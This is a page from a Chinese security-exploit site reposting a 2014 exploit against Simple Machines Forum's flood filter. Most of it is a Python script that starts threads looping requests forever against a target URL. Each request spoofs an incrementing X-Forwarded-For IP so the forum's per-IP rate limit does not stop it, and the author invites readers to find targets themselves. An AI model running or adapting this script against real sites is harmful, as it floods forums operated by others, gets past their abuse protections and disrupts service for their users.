首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SMF Flood Filter Issue
来源:http://pastebin.com/TiZc0T05 作者:Godoy 发布时间:2014-08-27  
# Exploit Title: SMF Incorrect Flood Filter Headers# Date: 21/08/2014#
Author: Daniel Godoy# Author Mail:
DanielGodoy[at]GobiernoFederal[dot]com# Author Web:
www.delincuentedigital.com.ar# Software: Simple Machine Forum #
http://www.simplemachines.org# Tested on: Linux# DORK: Try yourself ;)

	* #!/usr/bin/python
	* # RemoteExecution
	* #Autor: Daniel Godoy A.K.A hielasangre
	*  
	* import sys, threading, time, urllib2,re
	* print "Ingrese URL: "
	* url = raw_input()
	* a = b = c = d = 1
	* count = 0
	* class SMFPwner(threading.Thread):
	*   def __init__(self, num):
	*       threading.Thread.__init__(self)
	*       self.num = num      
	*   def run(self):
	*     while 1:
	*         global a,b,c,d,count, url
	*         data = ""
	*         while 1:
	*             while 1:
	*                 if d!=250:
	*                     d+=1
	*                 else:
	*                     if c!= 250:
	*                         c+=2
	*                         d=0
	*                     else:
	*                         if b!=250:
	*                             c=0
	*                             d=0
	*                             b+=1
	*                         else:
	*                             a+=1
	*                             b=0
	*                             c=0
	*                             d=0
	*                
head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
	*                 headers = { 'X-Forwarded-For' : head }
	*                
req = urllib2.Request(url, data, headers)
	*                 f = urllib2.urlopen(req)
	*                 count += 1
	*                 print "[ Visitando => " + url + " Por
" + str(count) +" vez ]"
	* for i in range(3):    
	*  ta = SMFPwner(i)
	*  ta.start()

 http://pastebin.com/TiZc0T05
-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ManageEngine Password Manager
·Grand MA 300 Fingerprint Reade
·Air Transfer Iphone 1.3.9 - Mu
·glibc Off-by-One NUL Byte gcon
·ManageEngine Desktop Central /
·Firefox WebIDL Privileged Java
·Internet Explorer MS14-029 Mem
·Plogger 1.0-RC1 - Authenticate
·ActualAnalyzer Lite 2.81 - Una
·PhpWiki - Remote Command Execu
·HybridAuth install.php PHP Cod
·XRMS - Blind SQL Injection and
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved